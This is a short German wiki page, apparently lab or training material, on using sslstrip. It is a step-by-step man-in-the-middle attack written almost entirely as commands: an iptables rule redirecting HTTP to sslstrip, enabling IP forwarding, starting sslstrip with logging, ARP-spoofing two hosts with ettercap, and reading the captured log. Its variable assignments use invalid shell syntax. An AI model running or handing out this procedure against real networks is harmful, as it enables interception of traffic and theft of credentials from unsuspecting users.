Ssl strip anwenden

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Vorbermerkung

Da python2 als obsolet gilt muss sslstrip auf einem älteren System laufen.

nat prerouting

  • iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

forwarding

  • echo 1 > /proc/sys/net/ipv4/ip_forward

sslstrip starten

  • sslstrip -a -f -k -w sslstrip.log

arpspoofing

  • $HOST1=10.0.10.102
  • $HOST2=10.0.10.104
  • ettercap -Tq -i eth0 -M arp /$HOST1,$HOST2// /$HOST2,$HOST1//

log

  • cat sslstrip.log